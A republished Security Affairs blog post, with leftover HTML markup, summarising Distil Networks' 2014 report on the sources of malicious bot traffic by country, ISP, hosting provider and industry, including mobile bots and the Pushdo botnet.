<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
<a href="http://securityaffairs.co/wordpress/24293/security/nist-removes-dual_ec_drbg.html" target="_blank">http://securityaffairs.co/wordpress/24293/security/nist-removes-dual_ec_drbg.html</a></div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-39358172010403417562014-04-23T21:31:00.001-07:002014-04-23T21:31:45.694-07:00[securityaffairs] An overview on the Bad Bot Landscape by Distil Networks<h2 style="background-color: #f9f7f5; color: #413f41; font-family: Arial, Helvetica, sans-serif; font-size: 1.3em; line-height: 26.399999618530273px; margin: 0px; padding: 15px 0px 5px;">
<span class="GINGER_SOFTWARE_mark" id="5998fbc0-e402-40ba-93a5-a7faf554aa6c">Distil</span> <span class="GINGER_SOFTWARE_mark" id="8dcd0470-eeae-4d72-8a05-4a408fbceb7e">Networks</span> security firm has published an interesting report on the Bad <span class="GINGER_SOFTWARE_mark" id="7cf343ec-585a-4868-9951-ac22a9e99a5d">Bot</span> Landscape, it is full of data on the evolution of malicious architecture.<a name='more'></a></h2>
<div style="background-color: #f9f7f5; color: #413f41; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
Surfing on the Internet I have found<a href="http://info.distilnetworks.com/bad_bot_report_2014" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="http://info.distilnetworks.com/bad_bot_report_2014">The Bad Bot Landscape Report Q1 2014</a> and interesting study issued by the <span class="GINGER_SOFTWARE_mark" id="a2c83478-6fda-4098-8b15-519bbc27e8f5"><span class="GINGER_SOFTWARE_mark" id="706fa529-5d03-428d-902f-a6cd633012e8"><span class="GINGER_SOFTWARE_mark" id="9e52babb-0a2c-4384-9387-5f767ec3f901"><span class="GINGER_SOFTWARE_mark" id="941139b4-d839-4e2c-99c2-101cf2289dde"><span class="GINGER_SOFTWARE_mark" id="465d9f61-68d4-4a20-87c9-8ae5f2fd863d"><span class="GINGER_SOFTWARE_mark" id="bc46985f-8088-49d5-ae3c-f8ff33b3e8d7"><span class="GINGER_SOFTWARE_mark" id="208088bc-c07e-4e4c-826e-f97b0f794b75"><span class="GINGER_SOFTWARE_mark" id="07a1c3f5-bb1d-4fce-94ee-ed58a58017f1">Distil</span></span></span></span></span></span></span> <span class="GINGER_SOFTWARE_mark" id="cd7ac1d6-8875-45f8-b24c-22ee1efd5694"><span class="GINGER_SOFTWARE_mark" id="0aeda939-f444-473f-9b94-af08d901a792"><span class="GINGER_SOFTWARE_mark" id="85a3649d-f654-4d17-b052-e955ad8474a9"><span class="GINGER_SOFTWARE_mark" id="5728cf63-4931-4735-b2f6-eeb906c8bed4"><span class="GINGER_SOFTWARE_mark" id="d2d230f5-6f92-4fae-8907-ce2451d4b718"><span class="GINGER_SOFTWARE_mark" id="2d772a62-49c0-43fa-a856-d258dc8ec891"><span class="GINGER_SOFTWARE_mark" id="600aaba6-0573-4170-b9cd-60f88348407a">Networks</span></span></span></span></span></span></span> security firm</span>which provides an interesting analysis of <span class="GINGER_SOFTWARE_mark" id="ccd0ab87-f0ed-4424-961d-807ac274397f">botnet</span> evolution detected by the system of the company.</div>
<div style="background-color: #f9f7f5; color: #413f41; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The Bad Bot Landscape Report Q1 2014 contains statistics on the evolution of malicious architectures under different axis of analysis like geographical area,originating ISP, originating organization and hosting provider, size and many others.</div>
<div style="background-color: #f9f7f5; color: #413f41; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
Experts at <span class="GINGER_SOFTWARE_mark" id="54812b04-169f-4cbb-a4b0-1d96c4e2c4d6">Distil</span> observed an increase of cloud-hosted <a href="http://securityaffairs.co/wordpress/13747/cyber-crime/http-botnets-the-dark-side-of-an-standard-protocol.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="HTTP-Botnets: The Dark Side of an Standard Protocol!">botnets</a>, mainly based on the<a href="http://securityaffairs.co/wordpress/21462/malware/sert-q4-2013-threat-intelligence-report-threat-landscape-evolution.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="SERT Q4 2013 Threat Intelligence Report on threat landscape evolution">Amazon</a> cloud architecture which was seen hosting 14% of malicious traffic.</div>
<div style="background-color: #f9f7f5; color: #413f41; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
Amazon isn’t the only provider abused by cybercrime, “cheap hosting” providers represent a privileged choice for bad actors because they usually implement a poor monitoring and a put in place a few safeguards to prevent bad <span class="GINGER_SOFTWARE_mark" id="2c835819-ddb2-4676-b4be-9d02d8e3ea28">bot</span> origination.</div>
<div style="background-color: #f9f7f5; color: #413f41; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
<em>Where Bad Bots Come From?</em></div>
<div style="background-color: #f9f7f5; color: #413f41; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
<a href="http://securityaffairs.co/wordpress/12756/cyber-crime/the-offer-of-russian-underground-for-phishing-campaigns.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="The offer of Russian underground for phishing campaigns">Russia</a>, <a href="http://securityaffairs.co/wordpress/15605/intelligence/hackers-comment-crew-i-changing-tactics.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="Comment Crew, China-based group of hackers is changing tactics">China</a>, and India are not in the top positions of the ranking, the US (46%), Great Britain (19%), Germany (9.6 %), and The Netherlands (3.3%) are the top four countries exploited by criminals to host the malicious structure.</div>
<div style="background-color: #f9f7f5; color: #413f41; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
<a href="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/The-Bad-Bot-Landscape-Report-Q1-2014-Top-countries.png" style="color: #4265a7; font-weight: bold; text-decoration: none;"><img alt="The Bad Bot Landscape Report Q1 2014 Top countries" class="aligncenter size-full wp-image-24268" height="350" src="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/The-Bad-Bot-Landscape-Report-Q1-2014-Top-countries.png" style="border: none; display: block; margin-left: auto; margin-right: auto;" title="An overview on the Bad Bot Landscape by Distil Networks" width="389" /></a></div>
<div style="background-color: #f9f7f5; color: #413f41; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The <span class="GINGER_SOFTWARE_mark" id="027ce39d-2f36-4eb8-9d3b-8594364e8c9e">botmasters</span> preferred those countries because they host the largest number of quality Internet exchange points, an essential factor for the <span class="GINGER_SOFTWARE_mark" id="f969613a-a9ea-4896-a241-8ca92ee54dbe">successfully</span> deployment of the <span class="GINGER_SOFTWARE_mark" id="17d5998f-aaa3-4e5e-a91e-f471ebed7343"></span><span class="GINGER_SOFTWARE_mark" id="17d5998f-aaa3-4e5e-a91e-f471ebed7343">botnets</span>.</div>
<blockquote style="background-color: #f9f7f5; border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
<div style="color: #413f41; font-size: 1em; margin-bottom: 10px; padding: 0px;">
<em>“Those who develop bad <span class="GINGER_SOFTWARE_mark" id="810f4950-3019-45b2-bdbc-3c763247390d"><span class="GINGER_SOFTWARE_mark" id="67d7770c-27a4-4954-a1bf-8ea00cc76cbc"><span class="GINGER_SOFTWARE_mark" id="93a5cf3e-86fc-43ad-ab4d-5fe6d91effbf"><span class="GINGER_SOFTWARE_mark" id="2e373c38-491e-410c-b6f4-c9eb635056a5"><span class="GINGER_SOFTWARE_mark" id="defa9999-5bf8-4e30-8412-8a430e2e3cbc"><span class="GINGER_SOFTWARE_mark" id="c0c50e61-56ad-415c-acdb-6a27f3081c23">bots</span></span></span></span></span></span> want them to attack as fast as possible, prior to detection and mitigation steps, and they want to do this as cost effectively as possible. For this reason, they attempt to use inexpensive cloud hosting providers that offer quick and easy set-up. These cloud providers locate their infrastructure where space and bandwidth come cheap, which is at major Internet exchange points. Therefore, most frequent offending nations represent those with the largest number of quality Internet exchange points.” states the The Bad Bot Landscape Report Q1 2014.</em></div>
</blockquote>
<div style="background-color: #f9f7f5; color: #413f41; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The experts at <span class="GINGER_SOFTWARE_mark" id="a2c83478-6fda-4098-8b15-519bbc27e8f5"><span class="GINGER_SOFTWARE_mark" id="706fa529-5d03-428d-902f-a6cd633012e8"><span class="GINGER_SOFTWARE_mark" id="f09ff655-6f68-4553-86c9-46f8e8f1ee68"><span class="GINGER_SOFTWARE_mark" id="de2402fb-fc83-43d5-a641-73cc6d989ff1"><span class="GINGER_SOFTWARE_mark" id="f66aa92c-1b88-45db-b987-8a4739378cac"><span class="GINGER_SOFTWARE_mark" id="ed06d8cb-c65e-47ea-9e4f-52dcff9be800"><span class="GINGER_SOFTWARE_mark" id="4459c139-d427-448c-bccd-7d90fb985992">Distil</span></span></span></span></span></span> <span class="GINGER_SOFTWARE_mark" id="cd7ac1d6-8875-45f8-b24c-22ee1efd5694">Networks</span> revealed that </span>Verizon Business was responsible for nearly 11 % of all malicious <span class="GINGER_SOFTWARE_mark" id="41e64176-9424-440b-b838-fba18f437563">bot</span> traffic while and Level 3 Communications account for 10%.</div>
<blockquote style="background-color: #f9f7f5; border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
<div style="color: #413f41; font-size: 1em; margin-bottom: 10px; padding: 0px;">
<em>“From the ISP perspective, costs run much higher when trying to clean up infected computers. In the case of residential ISPs, informing consumers that their computers are infected with malware and helping them perform the associated cleanup would triple support costs,” explains the The Bad Bot Landscape Report Q1 2014.</em></div>
</blockquote>
<div style="background-color: #f9f7f5; color: #413f41; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
Analyzing the <span class="GINGER_SOFTWARE_mark" id="6d0ccd11-6ce8-4beb-a1e6-ea964149f49c">botnet</span> distribution per industry The Bad Bot Landscape Report Q1 2014 reports that the <span class="GINGER_SOFTWARE_mark" id="eea477f4-e93f-41c4-9102-2884b7430c3c">financial services industry</span> is the one that serves up the highest <span class="GINGER_SOFTWARE_mark" id="63e6a2ed-fed6-4059-98f2-dfeb23ee5837">botnet</span>traffic.</div>
<div style="background-color: #f9f7f5; color: #413f41; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
During the last year <span class="GINGER_SOFTWARE_mark" id="638fe3df-93c4-478c-91dd-e8d08db0c4a0">Distil</span> firm detected <span class="GINGER_SOFTWARE_mark" id="3d853101-e8fa-49fa-b236-ddbfc11f9954">bad bot</span> traffic originating from every wireless provider operating in the United States, <span class="GINGER_SOFTWARE_mark" id="5c4d1960-d0f7-4c68-8e09-1284de3f76d3">botnets</span> are targeting <a href="http://securityaffairs.co/wordpress/15759/cyber-crime/android-botnets-on-the-rise-case-study.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="Android botnets on the rise – case study">mobile platform</a>, the illicit activities grew up of more than 1,000 percent in the last 12 months.</div>
<div style="background-color: #f9f7f5; color: #413f41; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
<a href="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/The-Bad-Bot-Landscape-Report-Q1-2014-Infographic.png" style="color: #4265a7; font-weight: bold; text-decoration: none;"><img alt="The Bad Bot Landscape Report Q1 2014 Infographic" class="aligncenter wp-image-24271" height="575" src="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/The-Bad-Bot-Landscape-Report-Q1-2014-Infographic.png" style="border: none; display: block; margin-left: auto; margin-right: auto;" title="An overview on the Bad Bot Landscape by Distil Networks" width="493" /></a></div>
<div style="background-color: #f9f7f5; color: #413f41; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
Following the Key findings:</div>
<ul style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; list-style: none; margin: 0px 0px 10px 10px; padding: 0px;">
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>To date, <span class="GINGER_SOFTWARE_mark" id="25702e37-a9a3-4861-82d2-b573eac3aa36"><span class="GINGER_SOFTWARE_mark" id="349d5321-2737-42e2-af66-6637f866bf6d"><span class="GINGER_SOFTWARE_mark" id="eeec0fa6-4fbb-45a2-9d39-2363dd6ae940">Distil</span></span></span> has identified, tracked and catalogued over 8 Billion bad <span class="GINGER_SOFTWARE_mark" id="f5513905-57f1-4670-a87b-b60ede7a331b"><span class="GINGER_SOFTWARE_mark" id="0eafbac6-421f-4ab5-99b1-bab5948b683c"><span class="GINGER_SOFTWARE_mark" id="3f949297-8e78-44dc-bebf-21a6d6a2cea1">bots</span></span></span> 4 Bad <span class="GINGER_SOFTWARE_mark" id="bfd2f0d4-ae3b-4958-99cf-abba30645f06"><span class="GINGER_SOFTWARE_mark" id="421fb7f8-680b-4935-ab45-69891269cbcd"><span class="GINGER_SOFTWARE_mark" id="78c943b3-ecfb-4822-b546-912ba2985e29">bots</span></span></span> ~doubled as a percentage of all web traffic between Q1 and Q4 2013, from 12.25% to 23.6%.</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>Good <span class="GINGER_SOFTWARE_mark" id="683f6eaa-033b-4b4d-9baf-470af69a94ce"><span class="GINGER_SOFTWARE_mark" id="987a1d30-e4c7-40fe-83fc-5f70a797ed37"><span class="GINGER_SOFTWARE_mark" id="a62ee986-70e3-4f04-88b0-cad07d480c26">bots</span></span></span> dropped as a percentage of all web traffic between Q1 and Q4 2013, from 27.25% to 19.4%</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>More bad <span class="GINGER_SOFTWARE_mark" id="a07596f0-dd8a-4607-96a7-c18850b1153e"><span class="GINGER_SOFTWARE_mark" id="c03b3851-724b-4557-9da7-66c4533c8da5"><span class="GINGER_SOFTWARE_mark" id="334a272a-f568-4d7f-8d47-40e32ba5364c">bots</span></span></span> originate in the USA than from any other country</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>The top four bad-<span class="GINGER_SOFTWARE_mark" id="09032b72-47a8-4ccb-a0f5-564c8ff29dee"><span class="GINGER_SOFTWARE_mark" id="19a43a29-e1c7-4c02-bf0f-66263ec4bd0f"><span class="GINGER_SOFTWARE_mark" id="0aac1cc5-468a-40ee-af76-6a11c89889db">bot</span></span></span> countries are the USA, Great Britain, Germany and The Netherlands, NOT the usual suspects of Russia, China and India</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>Verizon Business and Level 3 Communications originate the most <span class="GINGER_SOFTWARE_mark" id="d5de6a32-af94-4d68-bddd-4681cab0b2a1"><span class="GINGER_SOFTWARE_mark" id="d19ecc70-1cd1-4275-b9c8-87cd550ec5fc"><span class="GINGER_SOFTWARE_mark" id="7c41c268-49cd-4ed1-95e8-3acb6af72bf9">bad bot</span></span></span> traffic in a global ISP comparison, 11% and 10% of all bad <span class="GINGER_SOFTWARE_mark" id="22736505-dea1-40c6-8437-bc451ab497df"><span class="GINGER_SOFTWARE_mark" id="99ca4455-4869-4ba1-a90b-6317f8fc4795"><span class="GINGER_SOFTWARE_mark" id="b0f5b8f2-18d4-4608-8d3c-a8fbae767b9b">bot</span></span></span> traffic, respectively</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>Amazon serves the most <span class="GINGER_SOFTWARE_mark" id="37aea9ef-7b13-4ecf-b028-192679845bec"><span class="GINGER_SOFTWARE_mark" id="1f644364-0d18-49ef-9b20-dad827bdddeb"><span class="GINGER_SOFTWARE_mark" id="49448dc5-61cb-4704-b21a-c8374b85a83c">bad bot</span></span></span> traffic among hosting providers worldwide, 14%</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>More than 1,100 ISPs and hosting providers serve bad <span class="GINGER_SOFTWARE_mark" id="79f4a60f-4cc5-4d29-8556-06412e43be66"><span class="GINGER_SOFTWARE_mark" id="deaba25c-9cf0-43c8-86aa-949ba62b01d4"><span class="GINGER_SOFTWARE_mark" id="1fe5938c-4339-44be-8408-b5aaa802edd5">bots</span></span></span> as 70% or more of their total traffic</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>Bad <span class="GINGER_SOFTWARE_mark" id="ded5c3ff-0ec1-460c-a332-a4681e61dce4"><span class="GINGER_SOFTWARE_mark" id="f565fc14-231e-4e73-b692-d9fdbb707cc8"><span class="GINGER_SOFTWARE_mark" id="75fb0332-021d-4f83-9e12-6a0857cfb863">bots</span></span></span> attack most between 6pm and 9pm ET (US-only data for this point)</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>The biggest bad <span class="GINGER_SOFTWARE_mark" id="299a2cf2-a430-4927-ab77-f3ee66fd2e87"><span class="GINGER_SOFTWARE_mark" id="c1ad732f-439a-493d-a6b3-95cc1920d74b"><span class="GINGER_SOFTWARE_mark" id="ca0246f5-3e39-4a03-9b05-5c843ce8b252">bot</span></span></span> of 2013 was “Pushdo”, impacting 4.2 million IP addresses and ~4 million computers</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>The Financial Services industry had more organizations serving a <span class="GINGER_SOFTWARE_mark" id="058d580b-9d1c-453e-b75e-857d52776c9e"><span class="GINGER_SOFTWARE_mark" id="fd0a4f7d-374e-4d86-a07b-83dd5e60d011"><span class="GINGER_SOFTWARE_mark" id="7b7cb656-7cb5-48e7-a0f0-8eb7e6b6dd9e">high</span></span></span>percentage of bad <span class="GINGER_SOFTWARE_mark" id="d4fd4b4c-9f55-432e-b395-192df3d9bb89"><span class="GINGER_SOFTWARE_mark" id="98e783ba-dc28-4b5c-aceb-28f7e267b11a"><span class="GINGER_SOFTWARE_mark" id="bfe10bfe-cb4c-4454-ae16-266f952a5fdf">bot</span></span></span> traffic than any other industry</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>Bad <span class="GINGER_SOFTWARE_mark" id="6ca12e86-3df2-4b81-8fd5-5acf7161e8a3"><span class="GINGER_SOFTWARE_mark" id="b12a5e86-9d95-434b-8b6a-7f357cd6f210"><span class="GINGER_SOFTWARE_mark" id="dc2abbcd-93ea-4306-9313-4a34146bb770">bots</span></span></span> are 5 times more likely to attempt to ‘Get’ data/information than ‘Post’ it</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>The <a href="http://securityaffairs.co/wordpress/12862/malware/mobile-botnets-from-anticipation-to-reality.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="Mobile Botnets: From anticipation to reality!">Mobile <span class="GINGER_SOFTWARE_mark" id="d888a2a0-f6fe-444b-b1f5-a0b3e59f2c40"><span class="GINGER_SOFTWARE_mark" id="e87754ae-3ec8-47fb-90cc-4007cc0ae0a3"><span class="GINGER_SOFTWARE_mark" id="ced3403a-bc3e-4c57-93bd-49a6b360e7f7">bad bot</span></span></span></a> threat is gaining significance, with bad <span class="GINGER_SOFTWARE_mark" id="6cb239d4-26af-44cc-ae05-10f1aa17aaf7"><span class="GINGER_SOFTWARE_mark" id="90456183-3694-4e19-9785-0ff82df77bf8"><span class="GINGER_SOFTWARE_mark" id="8acce5d9-9a67-43c5-872a-be9e96a82258">bots</span></span></span> running across 9 of the world’s top 10 mobile operators</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>Mobile bad <span class="GINGER_SOFTWARE_mark" id="ef34985d-9621-447a-935a-2a3ae1f152cc"><span class="GINGER_SOFTWARE_mark" id="3fe56f72-7873-495b-ae9c-6cca778bd396"><span class="GINGER_SOFTWARE_mark" id="5a64497e-3d64-41b1-a614-41958d4f7111">bots</span></span></span> are far more prevalent in the US mobile networks than those of other nations</em></li>
</ul>
<span style="color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><span style="line-height: 26.399999618530273px;"><i><a href="http://securityaffairs.co/wordpress/24266/cyber-crime/bad-bot-landscape.html" target="_blank">http://securityaffairs.co/wordpress/24266/cyber-crime/bad-bot-landscape.html</a></i></span></span>Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0